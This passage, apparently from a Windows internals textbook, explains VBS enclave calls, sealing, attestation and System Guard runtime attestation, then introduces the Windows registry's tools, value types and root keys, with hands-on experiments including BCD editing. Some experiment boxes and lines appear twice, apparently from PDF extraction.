the system performs the first enclave call, which executes the initialization code of the platform DLL.
Step 4: Enclave calls (inbound and outbound) After the enclave has been correctly initialized, an
application can make an arbitrary number of calls into the enclave. All the callable functions in the en-
clave need to be exported. An application can call the standard GetProcAddress API to get the address
of the enclave’s function and then use the CallEnclave routine for transferring the execution control to
the secure enclave. In this scenario, which describes an inbound call, the NtCallEnclave kernel routine
384
CHAPTER 9 Virtualization technologies
performs the thread selection algorithm, which binds the calling VTL 0 thread to an enclave thread,
according to the following rules:
I
If the normal thread was not previously called by the enclave (enclaves support nested calls),
then an arbitrary idle enclave thread is selected for execution. In case no idle enclave threads
are available, the call blocks until an enclave thread becomes available (if specified by the caller;
otherwise the call simply fails).
I
In case the normal thread was previously called by the enclave, then the call into the enclave is
made on the same enclave thread that issued the previous call to the host.
A list of enclave thread’s descriptors is maintained by both the NT and Secure Kernel. When a
normal thread is bound to an enclave thread, the enclave thread is inserted in another list, which is
called the bound threads list. Enclave threads tracked by the latter are currently running and are not
available anymore.
After the thread selection algorithm succeeds, the NT kernel emits the CALLENCLAVE secure call.
The Secure Kernel creates a new stack frame for the enclave and returns to user mode. The first user
mode function executed in the context of the enclave is RtlEnclaveCallDispatcher. The latter, in case the
enclave call was the first one ever emitted, transfers the execution to the initialization routine of the
VSM enclave runtime DLL (Vertdll.dll), which initializes the CRT, the loader, and all the services provided
to the enclave; it finally calls the DllMain function of the enclave’s main module and of all its dependent
images (by specifying a DLL_PROCESS_ATTACH reason).
In normal situations, where the enclave platform DLL has been already initialized, the enclave
dispatcher invokes the DllMain of each module by specifying a DLL_THREAD_ATTACH reason, verifies
whether the specified address of the target enclave’s function is valid, and, if so, finally calls the target
function. When the target enclave’s routine finishes its execution, it returns to VTL 0 by calling back into
the containing process. For doing this, it still relies on the enclave platform DLL, which again calls the
NtCallEnclave kernel routine. Even though the latter is implemented slightly differently in the Secure
Kernel, it adopts a similar strategy for returning to VTL 0. The enclave itself can emit enclave calls for
executing some function in the context of the unsecure containing process. In this scenario (which
describes an outbound call), the enclave code uses the CallEnclave routine and specifies the address of
an exported function in the containing process’s main module.
Step 5: Termination and destruction When termination of an entire enclave is requested through
the TerminateEnclave API, all threads executing inside the enclave will be forced to return to VTL 0.
Once termination of an enclave is requested, all further calls into the enclave will fail. As threads ter-
minate, their VTL1 thread state (including thread stacks) is destroyed. Once all threads have stopped
executing, the enclave can be destroyed. When the enclave is destroyed, all remaining VTL 1 state
associated with the enclave is destroyed, too (including the entire enclave address space), and all pages
are freed in VTL 0. Finally, the enclave VAD is deleted and all committed enclave memory is freed.
Destruction is triggered when the containing process calls VirtualFree with the base of the enclave’s ad-
dress range. Destruction is not possible unless the enclave has been terminated or was never initialized.
CHAPTER 9 Virtualization technologies
385
Note As we have discussed previously, all the memory pages that are mapped into the
enclave address space are private. This has multiple implications. No memory pages that
belong to the VTL 0 containing process are mapped in the enclave address space, though
(and also no VADs describing the containing process’s allocation is present). So how can the
enclave access all the memory pages of the containing process?
The answer is in the Secure Kernel page fault handler (SkmmAccessFault). In its code, the
fault handler checks whether the faulting process is an enclave. If it is, the fault handler
checks whether the fault happens because the enclave tried to execute some code out-
side its region. In this case, it raises an access violation error. If the fault is due to a read
or write access outside the enclave’s address space, the secure page fault handler emits a
GET_PHYSICAL_PAGE normal service, which results in the VTL 0 access fault handler to be
called. The VTL 0 handler checks the containing process VAD tree, obtains the PFN of the
page from its PTE—by bringing it in memory if needed—and returns it to VTL 1. At this
stage, the Secure Kernel can create the necessary paging structures to map the physical
page at the same virtual address (which is guaranteed to be available thanks to the property
of the enclave itself) and resumes the execution. The page is now valid in the context of the
secure enclave.
Sealing and attestation
VBS-based enclaves, like hardware-based enclaves, support both the sealing and attestation of the
data. The term sealing refers to the encryption of arbitrary data using one or more encryption keys
that aren’t visible to the enclave’s code but are managed by the Secure Kernel and tied to the ma-
chine and to the enclave’s identity. Enclaves will never have access to those keys; instead, the Secure
Kernel offers services for sealing and unsealing arbitrary contents (through the EnclaveSealData and
EnclaveUnsealData APIs) using an appropriate key designated by the enclave. At the time the data is
sealed, a set of parameters is supplied that controls which enclaves are permitted to unseal the data.
The following policies are supported:
I
Security version number (SVN) of the Secure Kernel and of the primary image No en-
clave can unseal any data that was sealed by a later version of the enclave or the Secure Kernel.
I
Exact code The data can be unsealed only by an enclave that maps the same identical mod-
ules of the enclave that has sealed it. The Secure Kernel verifies the hash of the Unique ID of
every image mapped in the enclave to allow a proper unsealing.
I
Same image, family, or author The data can be unsealed only by an enclave that has the
same author ID, family ID, and/or image ID.
I
Runtime policy The data can be unsealed only if the unsealing enclave has the same debug-
ging policy of the original one (debuggable versus nondebuggable).
386
CHAPTER 9 Virtualization technologies
It is possible for every enclave to attest to any third party that it is running as a VBS enclave with all the
protections offered by the VBS-enclave architecture. An enclave attestation report provides proof that
a specific enclave is running under the control of the Secure Kernel. The attestation report contains the
identity of all code loaded into the enclave as well as policies controlling how the enclave is executing.
Describing the internal details of the sealing and attestation operations is outside the scope of this
book. An enclave can generate an attestation report through the EnclaveGetAttestationReport API. The
memory buffer returned by the API can be transmitted to another enclave, which can “attest” the in-
tegrity of the environment in which the original enclave ran by verifying the attestation report through
the EnclaveVerifyAttestationReport function.
System Guard runtime attestation
System Guard runtime attestation (SGRA) is an operating system integrity component that leverages
the aforementioned VBS-enclaves—together with a remote attestation service component—to pro-
vide strong guarantees around its execution environment. This environment is used to assert sensitive
system properties at runtime and allows for a relying party to observe violations of security promises
that the system provides. The first implementation of this new technology was introduced in Windows
10 April 2018 Update (RS4).
SGRA allows an application to view a statement about the security posture of the device. This state-
ment is composed of three parts:
I
A session report, which includes a security level describing the attestable boot-time properties
of the device
I
A runtime report, which describes the runtime state of the device
I
A signed session certificate, which can be used to verify the reports
The SGRA service, SgrmBroker.exe, hosts a component (SgrmEnclave_secure.dll) that runs in a VTL
1 as a VBS enclave that continually asserts the system for runtime violations of security features. These
assertions are surfaced in the runtime report, which can be verified on the backend by a relying part. As
the assertions run in a separate domain-of-trust, attacking the contents of the runtime report directly
becomes difficult.
SGRA internals
Figure 9-41 shows a high-level overview of the architecture of Windows Defender System Guard run-
time attestation, which consists of the following client-side components:
I
The VTL-1 assertion engine: SgrmEnclave_secure.dll
I
A VTL-0 kernel mode agent: SgrmAgent.sys
I
A VTL-0 WinTCB Protected broker process hosting the assertion engine: SgrmBroker.exe
I
A VTL-0 LPAC process used by the WinTCBPP broker process to interact with the networking
stack: SgrmLpac.exe
CHAPTER 9 Virtualization technologies
387
VTL0
VTL1
Windows
Defender
ATP cloud
Attestation
service
Windows
Defender
ATP
Windows
Defender
AV
Critical
Services
Third party
software
Windows Defender System Guard API
Windows Defender System Guard
runtime monitor broker
Windows Defender System Guard
runtime monitor enclave
(Assertion engine)
Windows Defender System Guard
runtime monitor agent
FIGURE 9-41 Windows Defender System Guard runtime attestation’s architecture.
To be able to rapidly respond to threats, SGRA includes a dynamic scripting engine (Lua) forming
the core of the assertion mechanism that executes in a VTL 1 enclave—an approach that allows fre-
quent assertion logic updates.
Due to the isolation provided by the VBS enclave, threads executing in VTL 1 are limited in terms of
their ability to access VTL 0 NT APIs. Therefore, for the runtime component of SGRA to perform mean-
ingful work, a way of working around the limited VBS enclave API surface is necessary.
An agent-based approach is implemented to expose VTL 0 facilities to the logic running in VTL 1;
these facilities are termed assists and are serviced by the SgrmBroker user mode component or by an
agent driver running in VTL 0 kernel mode (SgrmAgent.sys). The VTL 1 logic running in the enclave can
call out to these VTL 0 components with the goal of requesting assists that provide a range of facilities,
including NT kernel synchronize primitives, page mapping capabilities, and so on.
As an example of how this mechanism works, SGRA is capable of allowing the VTL 1 assertion
engine to directly read VTL 0–owned physical pages. The enclave requests a mapping of an arbitrary
page via an assist. The page would then be locked and mapped into the SgrmBroker VTL 0 address
space (making it resident). As VBS enclaves have direct access to the host process address space, the
secure logic can read directly from the mapped virtual addresses. These reads must be synchronized
with the VTL 0 kernel itself. The VTL 0 resident broker agent (SgrmAgent.sys driver) is also used to
perform synchronization.
Assertion logic
As mentioned earlier, SGRA asserts system security properties at runtime. These assertions are execut-
ed within the assertion engine hosted in the VBS-based enclave. Signed Lua bytecode describing the
assertion logic is provided to the assertion engine during start up.
388
CHAPTER 9 Virtualization technologies
Assertions are run periodically. When a violation of an asserted property is discovered (that is, when
the assertion “fails”), the failure is recorded and stored within the enclave. This failure will be exposed
to a relying party in the runtime report that is generated and signed (with the session certificate) within
the enclave.
An example of the assertion capabilities provided by SGRA are the asserts surrounding various ex-
ecutive process object attributes—for example, the periodic enumeration of running processes and the
assertion of the state of a process’s protection bits that govern protected process policies.
The flow for the assertion engine performing this check can be approximated to the following steps:
1.
The assertion engine running within VTL 1 calls into its VTL 0 host process (SgrmBroker) to
request that an executive process object be referenced by the kernel.
2.
The broker process forwards this request to the kernel mode agent (SgrmAgent), which services
the request by obtaining a reference to the requested executive process object.
3.
The agent notifies the broker that the request has been serviced and passes any necessary
metadata down to the broker.
4.
The broker forwards this response to the requesting VTL 1 assertion logic.
5.
The logic can then elect to have the physical page backing the referenced executive process
object locked and mapped into its accessible address space; this is done by calling out of the
enclave using a similar flow as steps 1 through 4.
6.
Once the page is mapped, the VTL 1 engine can read it directly and check the executive process
object protection bit against its internally held context.
7.
The VTL 1 logic again calls out to VTL 0 to unwind the page mapping and kernel object reference.
Reports and trust establishment
A WinRT-based API is exposed to allow relying parties to obtain the SGRA session certificate and the
signed session and runtime reports. This API is not public and is available under NDA to vendors that
are part of the Microsoft Virus Initiative (note that Microsoft Defender Advanced Threat Protection is
currently the only in-box component that interfaces directly with SGRA via this API).
The flow for obtaining a trusted statement from SGRA is as follows:
1.
A session is created between the relying party and SGRA. Establishment of the session requires
a network connection. The SgrmEnclave assertion engine (running in VTL-1) generates a public-
private key pair, and the SgrmBroker protected process retrieves the TCG log and the VBS at-
testation report, sending them to Microsoft’s System Guard attestation service with the public
component of the key generated in the previous step.
2.
The attestation service verifies the TCG log (from the TPM) and the VBS attestation report (as
proof that the logic is running within a VBS enclave) and generates a session report describing
the attested boot time properties of the device. It signs the public key with an SGRA attestation
service intermediate key to create a certificate that will be used to verify runtime reports.
CHAPTER 9 Virtualization technologies
389
3.
The session report and the certificate are returned to the relying party. From this point, the
relying party can verify the validity of the session report and runtime certificate.
4.
Periodically, the relying party can request a runtime report from SGRA using the established
session: the SgrmEnclave assertion engine generates a runtime report describing the state of
the assertions that have been run. The report will be signed using the paired private key gener-
ated during session creation and returned to the relying party (the private key never leaves
the enclave).
5.
The relying party can verify the validity of the runtime report against the runtime certificate
obtained earlier and make a policy decision based on both the contents of the session report
(boot-time attested state) and the runtime report (asserted state).
SGRA provides some API that relying parties can use to attest to the state of the device at a point
in time. The API returns a runtime report that details the claims that Windows Defender System Guard
runtime attestation makes about the security posture of the system. These claims include assertions,
which are runtime measurements of sensitive system properties. For example, an app could ask
Windows Defender System Guard to measure the security of the system from the hardware-backed
enclave and return a report. The details in this report can be used by the app to decide whether it
performs a sensitive financial transaction or displays personal information.
As discussed in the previous section, a VBS-based enclave can also expose an enclave attestation
report signed by a VBS-specific signing key. If Windows Defender System Guard can obtain proof that
the host system is running with VSM active, it can use this proof with a signed session report to ensure
that the particular enclave is running. Establishing the trust necessary to guarantee that the runtime
report is authentic, therefore, requires the following:
1.
Attesting to the boot state of the machine; the OS, hypervisor, and Secure Kernel (SK) binaries
must be signed by Microsoft and configured according to a secure policy.
2.
Binding trust between the TPM and the health of the hypervisor to allow trust in the Measured
Boot Log.
3.
Extracting the needed key (VSM IDKs) from the Measured Boot Log and using these to verify
the VBS enclave signature (see Chapter 12 for further details).
4.
Signing of the public component of an ephemeral key-pair generated within the enclave with
a trusted Certificate Authority to issue a session certificate.
5.
Signing of the runtime report with the ephemeral private key.
Networking calls between the enclave and the Windows Defender System Guard attestation service
are made from VTL 0. However, the design of the attestation protocol ensures that it is resilient against
tampering even over untrusted transport mechanisms.
Numerous underlying technologies are required before the chain of trust described earlier can be
sufficiently established. To inform a relying party of the level of trust in the runtime report that they can
expect on any particular configuration, a security level is assigned to each Windows Defender System
Guard attestation service-signed session report. The security level reflects the underlying technologies
390
CHAPTER 9 Virtualization technologies
enabled on the platform and attributes a level of trust based on the capabilities of the platform.
Microsoft is mapping the enablement of various security technologies to security levels and will share
this when the API is published for third-party use. The highest level of trust is likely to require the fol-
lowing features, at the very least:
I
VBS-capable hardware and OEM configuration.
I
Dynamic root-of-trust measurements at boot.
I
Secure boot to verify hypervisor, NT, and SK images.
I
Secure policy ensuring Hypervisor Enforced Code Integrity (HVCI) and kernel mode code integ-
rity (KMCI), test-signing is disabled, and kernel debugging is disabled.
I
The ELAM driver is present.
Conclusion
Windows is able to manage and run multiple virtual machines thanks to the Hyper-V hypervisor and
its virtualization stack, which, combined together, support different operating systems running in a
VM. Over the years, the two components have evolved to provide more optimizations and advanced
features for the VMs, like nested virtualization, multiple schedulers for the virtual processors, different
types of virtual hardware support, VMBus, VA-backed VMs, and so on.
Virtualization-based security provides to the root operating system a new level of protection
against malware and stealthy rootkits, which are no longer able to steal private and confidential infor-
mation from the root operating system’s memory. The Secure Kernel uses the services supplied by the
Windows hypervisor to create a new execution environment (VTL 1) that is protected and not acces-
sible to the software running in the main OS. Furthermore, the Secure Kernel delivers multiple services
to the Windows ecosystem that help to maintain a more secure environment.
The Secure Kernel also defines the Isolated User Mode, allowing user mode code to be executed
in the new protected environment through trustlets, secure devices, and enclaves. The chapter ended
with the analysis of System Guard Runtime Attestation, a component that uses the services exposed by
the Secure Kernel to measure the workstation’s execution environment and to provide strong guaran-
tees about its integrity.
In the next chapter, we look at the management and diagnostics components of Windows and
discuss important mechanisms involved with their infrastructure: the registry, services, Task scheduler,
Windows Management Instrumentation (WMI), kernel Event Tracing, and so on.
391
C H A P T E R 1 0
Management, diagnostics,
and tracing
T
his chapter describes fundamental mechanisms in the Microsoft Windows operating system that
are critical to its management and configuration. In particular, we describe the Windows registry,
services, the Unified Background process manager, and Windows Management Instrumentation (WMI).
The chapter also presents some fundamental components used for diagnosis and tracing purposes like
Event Tracing for Windows (ETW), Windows Notification Facility (WNF), and Windows Error Reporting
(WER). A discussion on the Windows Global flags and a brief introduction on the kernel and User Shim
Engine conclude the chapter.
The registry
The registry plays a key role in the configuration and control of Windows systems. It is the repository
for both systemwide and per-user settings. Although most people think of the registry as static data
stored on the hard disk, as you’ll see in this section, the registry is also a window into various in-
memory structures maintained by the Windows executive and kernel.
We’re starting by providing you with an overview of the registry structure, a discussion of the data
types it supports, and a brief tour of the key information Windows maintains in the registry. Then we
look inside the internals of the configuration manager, the executive component responsible for imple-
menting the registry database. Among the topics we cover are the internal on-disk structure of the
registry, how Windows retrieves configuration information when an application requests it, and what
measures are employed to protect this critical system database.
Viewing and changing the registry
In general, you should never have to edit the registry directly. Application and system settings stored in
the registry that require changes should have a corresponding user interface to control their modifi-
cation. However, as we mention several times in this book, some advanced and debug settings have
no editing user interface. Therefore, both graphical user interface (GUI) and command-line tools are
included with Windows to enable you to view and modify the registry.
Windows comes with one main GUI tool for editing the registry—Regedit.exe—and several
command-line registry tools. Reg.exe, for instance, has the ability to import, export, back up, and
392
CHAPTER 10 Management, diagnostics, and tracing
restore keys, as well as to compare, modify, and delete keys and values. It can also set or query flags
used in UAC virtualization. Regini.exe, on the other hand, allows you to import registry data based on
text files that contain ASCII or Unicode configuration data.
The Windows Driver Kit (WDK) also supplies a redistributable component, Offregs.dll, which hosts
the Offline Registry Library. This library allows loading registry hive files (covered in the “Hives” section
later in the chapter) in their binary format and applying operations on the files themselves, bypassing
the usual logical loading and mapping that Windows requires for registry operations. Its use is primari-
ly to assist in offline registry access, such as for purposes of integrity checking and validation. It can also
provide performance benefits if the underlying data is not meant to be visible by the system because
the access is done through local file I/O instead of registry system calls.
Registry usage
There are four principal times at which configuration data is read:
I
During the initial boot process, the boot loader reads configuration data and the list of boot de-
vice drivers to load into memory before initializing the kernel. Because the Boot Configuration
Database (BCD) is really stored in a registry hive, one could argue that registry access happens
even earlier, when the Boot Manager displays the list of operating systems.
I
During the kernel boot process, the kernel reads settings that specify which device drivers to
load and how various system elements—such as the memory manager and process manager—
configure themselves and tune system behavior.
I
During logon, Explorer and other Windows components read per-user preferences from the
registry, including network drive-letter mappings, desktop wallpaper, screen saver, menu be-
havior, icon placement, and, perhaps most importantly, which startup programs to launch and
which files were most recently accessed.
I
During their startup, applications read systemwide settings, such as a list of optionally installed
components and licensing data, as well as per-user settings that might include menu and tool-
bar placement and a list of most-recently accessed documents.
However, the registry can be read at other times as well, such as in response to a modification of a
registry value or key. Although the registry provides asynchronous callbacks that are the preferred way
to receive change notifications, some applications constantly monitor their configuration settings in the
registry through polling and automatically take updated settings into account. In general, however, on
an idle system there should be no registry activity and such applications violate best practices. (Process
Monitor, from Sysinternals, is a great tool for tracking down such activity and the applications at fault.)
The registry is commonly modified in the following cases:
I
Although not a modification, the registry’s initial structure and many default settings are
defined by a prototype version of the registry that ships on the Windows setup media that is
copied onto a new installation.
CHAPTER 10 Management, diagnostics, and tracing
393
I
Application setup utilities create default application settings and settings that reflect installa-
tion configuration choices.
I
During the installation of a device driver, the Plug and Play system creates settings in the reg-
istry that tell the I/O manager how to start the driver and creates other settings that configure
the driver’s operation. (See Chapter 6, “I/O system,” in Part 1 for more information on how
device drivers are installed.)
I
When you change application or system settings through user interfaces, the changes are often
stored in the registry.
Registry data types
The registry is a database whose structure is similar to that of a disk volume. The registry contains keys,
which are similar to a disk’s directories, and values, which are comparable to files on a disk. A key is a
container that can consist of other keys (subkeys) or values. Values, on the other hand, store data. Top-
level keys are root keys. Throughout this section, we’ll use the words subkey and key interchangeably.
Both keys and values borrow their naming convention from the file system. Thus, you can uniquely
identify a value with the name mark, which is stored in a key called trade, with the name trade\mark.
One exception to this naming scheme is each key’s unnamed value. Regedit displays the unnamed
value as (Default).
Values store different kinds of data and can be one of the 12 types listed in Table 10-1. The majority
of registry values are REG_DWORD, REG_BINARY, or REG_SZ. Values of type REG_DWORD can store
numbers or Booleans (true/false values); REG_BINARY values can store numbers larger than 32 bits or
raw data such as encrypted passwords; REG_SZ values store strings (Unicode, of course) that can repre-
sent elements such as names, file names, paths, and types.
TABLE 10-1 Registry value types
Value Type
Description
REG_NONE
No value type
REG_SZ
Fixed-length Unicode string
REG_EXPAND_SZ
Variable-length Unicode string that can have embedded environment variables
REG_BINARY
Arbitrary-length binary data
REG_DWORD
32-bit number
REG_DWORD_BIG_ENDIAN
32-bit number, with high byte first
REG_LINK
Unicode symbolic link
REG_MULTI_SZ
Array of Unicode NULL-terminated strings
REG_RESOURCE_LIST
Hardware resource description
REG_FULL_RESOURCE_DESCRIPTOR
Hardware resource description
REG_RESOURCE_REQUIREMENTS_LIST
Resource requirements
REG_QWORD
64-bit number
394
CHAPTER 10 Management, diagnostics, and tracing
The REG_LINK type is particularly interesting because it lets a key transparently point to another
key. When you traverse the registry through a link, the path searching continues at the target of the
link. For example, if \Root1\Link has a REG_LINK value of \Root2\RegKey and RegKey contains the value
RegValue, two paths identify RegValue: \Root1\Link\RegValue and \Root2\RegKey\RegValue. As ex-
plained in the next section, Windows prominently uses registry links: three of the six registry root keys
are just links to subkeys within the three nonlink root keys.
Registry logical structure
You can chart the organization of the registry via the data stored within it. There are nine root keys
(and you can’t add new root keys or delete existing ones) that store information, as shown in Table 10-2.
TABLE 10-2 The nine root keys
Root Key
Description
HKEY_CURRENT_USER
Stores data associated with the currently logged-on user
HKEY_CURRENT_USER_LOCAL_SETTINGS
Stores data associated with the currently logged-on user that are local to the
machine and are excluded from a roaming user profile
HKEY_USERS
Stores information about all the accounts on the machine
HKEY_CLASSES_ROOT
Stores file association and Component Object Model (COM) object registra-
tion information
HKEY_LOCAL_MACHINE
Stores system-related information
HKEY_PERFORMANCE_DATA
Stores performance information
HKEY_PERFORMANCE_NLSTEXT
Stores text strings that describe performance counters in the local language
of the area in which the computer system is running
HKEY_PERFORMANCE_TEXT
Stores text strings that describe performance counters in US English.
HKEY_CURRENT_CONFIG
Stores some information about the current hardware profile (deprecated)
Why do root-key names begin with an H? Because the root-key names represent Windows handles
(H) to keys (KEY). As mentioned in Chapter 1, “Concepts and tools” of Part 1, HKLM is an abbreviation
used for HKEY_LOCAL_MACHINE. Table 10-3 lists all the root keys and their abbreviations. The follow-
ing sections explain in detail the contents and purpose of each of these root keys.
TABLE 10-3 Registry root keys
Root Key
Abbreviation
Description
Link
HKEY_CURRENT_USER
HKCU
Points to the user profile
of the currently logged-on
user
Subkey under HKEY_USERS
corresponding to currently
logged-on user
HKEY_CURRENT_USER_LOCAL_SETTINGS
HKCULS
Points to the local settings
of the currently logged-on
user
Link to HKCU\Software\
Classes\Local Settings
HKEY_USERS
HKU
Contains subkeys for all
loaded user profiles
Not a link
CHAPTER 10 Management, diagnostics, and tracing
395
Root Key
Abbreviation
Description
Link
HKEY_CLASSES_ROOT
HKCR
Contains file association and
COM registration information
Not a direct link, but rather
a merged view of HKLM\
SOFTWARE\Classes and
HKEY_USERS\<SID>\
SOFTWARE\Classes
HKEY_LOCAL_MACHINE
HKLM
Global settings for the
machine
Not a link
HKEY_CURRENT_CONFIG
HKCC
Current hardware profile
HKLM\SYSTEM\
CurrentControlSet\
Hardware Profiles\Current
HKEY_PERFORMANCE_DATA
HKPD
Performance counters
Not a link
HKEY_PERFORMANCE_NLSTEXT
HKPNT
Performance counters
text strings
Not a link
HKEY_PERFORMANCE_TEXT
HKPT
Performance counters text
strings in US English
Not a link
HKEY_CURRENT_USER
The HKCU root key contains data regarding the preferences and software configuration of the locally
logged-on user. It points to the currently logged-on user’s user profile, located on the hard disk at
\Users\<username>\Ntuser.dat. (See the section “Registry internals” later in this chapter to find out how
root keys are mapped to files on the hard disk.) Whenever a user profile is loaded (such as at logon time
or when a service process runs under the context of a specific username), HKCU is created to map to
the user’s key under HKEY_USERS (so if multiple users are logged on in the system, each user would see
a different HKCU). Table 10-4 lists some of the subkeys under HKCU.
TABLE 10-4 HKEY_CURRENT_USER subkeys
Subkey
Description
AppEvents
Sound/event associations
Console
Command window settings (for example, width, height, and colors)
Control Panel
Screen saver, desktop scheme, keyboard, and mouse settings, as well as accessibility and
regional settings
Environment
Environment variable definitions
EUDC
Information on end-user defined characters
Keyboard Layout
Keyboard layout setting (for example, United States or United Kingdom)
Network
Network drive mappings and settings
Printers
Printer connection settings
Software
User-specific software preferences
Volatile Environment
Volatile environment variable definitions
396
CHAPTER 10 Management, diagnostics, and tracing
HKEY_USERS
HKU contains a subkey for each loaded user profile and user class registration database on the system. It
also contains a subkey named HKU\.DEFAULT that is linked to the profile for the system (which is used by
processes running under the local system account and is described in more detail in the section “Services”
later in this chapter). This is the profile used by Winlogon, for example, so that changes to the desktop
background settings in that profile will be implemented on the logon screen. When a user logs on to a
system for the first time and her account does not depend on a roaming domain profile (that is, the user’s
profile is obtained from a central network location at the direction of a domain controller), the system
creates a profile for her account based on the profile stored in %SystemDrive%\Users\Default.
The location under which the system stores profiles is defined by the registry value HKLM\
Software\Microsoft\Windows NT\CurrentVersion\ProfileList\ProfilesDirectory, which is by default
set to %SystemDrive%\Users. The ProfileList key also stores the list of profiles present on a system.
Information for each profile resides under a subkey that has a name reflecting the security identifier
(SID) of the account to which the profile corresponds. (See Chapter 7, “Security,” of Part 1 for more
information on SIDs.) Data stored in a profile’s key includes the time of the last load of the profile in the
LocalProfileLoadTimeLow value, the binary representation of the account SID in the Sid value, and the
path to the profile’s on-disk hive (Ntuser.dat file, described later in this chapter in the “Hives” section)
in the directory given by the ProfileImagePath value. Windows shows profiles stored on a system in the
User Profiles management dialog box, shown in Figure 10-1, which you access by clicking Configure
Advanced User Profile Properties in the User Accounts Control Panel applet.
FIGURE 10-1 The User Profiles management dialog box.
CHAPTER 10 Management, diagnostics, and tracing
397
EXPERIMENT: Watching profile loading and unloading
You can see a profile load into the registry and then unload by using the Runas command to
launch a process in an account that’s not currently logged on to the machine. While the new
process is running, run Regedit and note the loaded profile key under HKEY_USERS. After termi-
nating the process, perform a refresh in Regedit by pressing the F5 key, and the profile should no
longer be present.
HKEY_CLASSES_ROOT
HKCR consists of three types of information: file extension associations, COM class registrations, and
the virtualized registry root for User Account Control (UAC). (See Chapter 7 of Part 1 for more informa-
tion on UAC.) A key exists for every registered file name extension. Most keys contain a REG_SZ value
that points to another key in HKCR containing the association information for the class of files that
extension represents.
For example, HKCR\.xls would point to information on Microsoft Office Excel files. For example,
the default value contains “Excel.Sheet.8” that is used to instantiate the Excel COM object. Other keys
contain configuration details for all COM objects registered on the system. The UAC virtualized registry
is located in the VirtualStore key, which is not related to the other kinds of data stored in HKCR.
The data under HKEY_CLASSES_ROOT comes from two sources:
I
The per-user class registration data in HKCU\SOFTWARE\Classes (mapped to the file on hard
disk \Users\<username>\AppData\Local\Microsoft\Windows\Usrclass.dat)
I
Systemwide class registration data in HKLM\SOFTWARE\Classes
EXPERIMENT: Watching profile loading and unloading
You can see a profile load into the registry and then unload by using the Runas command to
launch a process in an account that’s not currently logged on to the machine. While the new
process is running, run Regedit and note the loaded profile key under HKEY_USERS. After termi-
nating the process, perform a refresh in Regedit by pressing the F5 key, and the profile should no
longer be present.
398
CHAPTER 10 Management, diagnostics, and tracing
There is a separation of per-user registration data from systemwide registration data so that roam-
ing profiles can contain customizations. Nonprivileged users and applications can read systemwide
data and can add new keys and values to systemwide data (which are mirrored in their per-user data),
but they can only modify existing keys and values in their private data. It also closes a security hole:
a nonprivileged user cannot change or delete keys in the systemwide version HKEY_CLASSES_ROOT;
thus, it cannot affect the operation of applications on the system.
HKEY_LOCAL_MACHINE
HKLM is the root key that contains all the systemwide configuration subkeys: BCD00000000, COMPONENTS
(loaded dynamically as needed), HARDWARE, SAM, SECURITY, SOFTWARE, and SYSTEM.
The HKLM\BCD00000000 subkey contains the Boot Configuration Database (BCD) information
loaded as a registry hive. This database replaces the Boot.ini file that was used before Windows Vista
and adds greater flexibility and isolation of per-installation boot configuration data. The BCD00000000
subkey is backed by the hidden BCD file, which, on UEFI systems, is located in \EFI\Microsoft\Boot. (For
more information on the BCD, see Chapter 12, "Startup and shutdown”).
Each entry in the BCD, such as a Windows installation or the command-line settings for the instal-
lation, is stored in the Objects subkey, either as an object referenced by a GUID (in the case of a boot
entry) or as a numeric subkey called an element. Most of these raw elements are documented in the
BCD reference in Microsoft Docs and define various command-line settings or boot parameters. The
value associated with each element subkey corresponds to the value for its respective command-line
flag or boot parameter.
The BCDEdit command-line utility allows you to modify the BCD using symbolic names for the ele-
ments and objects. It also provides extensive help for all the boot options available. A registry hive can
be opened remotely as well as imported from a hive file: you can modify or read the BCD of a remote
computer by using the Registry Editor. The following experiment shows you how to enable kernel de-
bugging by using the Registry Editor.
EXPERIMENT: Remote BCD editing
Although you can modify offline BCD stores by using the bcdedit /store command, in this
experiment you will enable debugging through editing the BCD store inside the registry. For the
purposes of this example, you edit the local copy of the BCD, but the point of this technique is
that it can be used on any machine’s BCD hive. Follow these steps to add the /DEBUG command-
line flag:
1.
Open the Registry Editor and then navigate to the HKLM\BCD00000000 key. Expand
every subkey so that the numerical identifiers of each Elements key are fully visible.
EXPERIMENT: Remote BCD editing
Although you can modify offline BCD stores by using the bcdedit /store command, in this
experiment you will enable debugging through editing the BCD store inside the registry. For the
purposes of this example, you edit the local copy of the BCD, but the point of this technique is
that it can be used on any machine’s BCD hive. Follow these steps to add the /DEBUG command-
line flag:
1.
Open the Registry Editor and then navigate to the HKLM\BCD00000000 key. Expand
every subkey so that the numerical identifiers of each Elements key are fully visible.
CHAPTER 10 Management, diagnostics, and tracing
399
2.
Identify the boot entry for your Windows installation by locating the Description with
a Type value of 0x10200003, and then select the 12000004 key in the Elements tree. In
the Element value of that subkey, you should find the name of your version of Windows,
such as Windows 10. In recent systems, you may have more than one Windows installa-
tion or various boot applications, like the Windows Recovery Environment or Windows
Resume Application. In those cases, you may need to check the 22000002 Elements
subkey, which contains the path, such as \Windows.
3.
Now that you’ve found the correct GUID for your Windows installation, create a new
subkey under the Elements subkey for that GUID and name it 0x260000a0. If this subkey
already exists, simply navigate to it. The found GUID should correspond to the identifi-
er value under the Windows Boot Loader section shown by the bcdedit /v command
(you can use the /store command-line option to inspect an offline store file).
4.
If you had to create the subkey, now create a binary value called Element inside it.
5.
Edit the value and set it to 1. This will enable kernel-mode debugging. Here’s what these
changes should look like:
Note The 0x12000004 ID corresponds to BcdLibraryString_ApplicationPath, whereas the
0x22000002 ID corresponds to BcdOSLoaderString_SystemRoot. Finally, the ID you added,
0x260000a0, corresponds to BcdOSLoaderBoolean_KernelDebuggerEnabled. These values
are documented in the BCD reference in Microsoft Docs.
2.
Identify the boot entry for your Windows installation by locating the Description with
a Type value of 0x10200003, and then select the 12000004 key in the Elements tree. In
the Element value of that subkey, you should find the name of your version of Windows,
Element value of that subkey, you should find the name of your version of Windows,
Element
such as Windows 10. In recent systems, you may have more than one Windows installa-
tion or various boot applications, like the Windows Recovery Environment or Windows
Resume Application. In those cases, you may need to check the 22000002 Elements
subkey, which contains the path, such as \Windows.
3.
Now that you’ve found the correct GUID for your Windows installation, create a new
subkey under the Elements subkey for that GUID and name it 0x260000a0. If this subkey
already exists, simply navigate to it. The found GUID should correspond to the identifi-
er value under the Windows Boot Loader section shown by the bcdedit /v command
(you can use the /store command-line option to inspect an offline store file).
4.
If you had to create the subkey, now create a binary value called Element inside it.
5.
Edit the value and set it to 1. This will enable kernel-mode debugging. Here’s what these
changes should look like:
400
CHAPTER 10 Management, diagnostics, and tracing
The HKLM\COMPONENTS subkey contains information pertinent to the Component Based
Servicing (CBS) stack. This stack contains various files and resources that are part of a Windows installa-
tion image (used by the Automated Installation Kit or the OEM Preinstallation Kit) or an active instal-
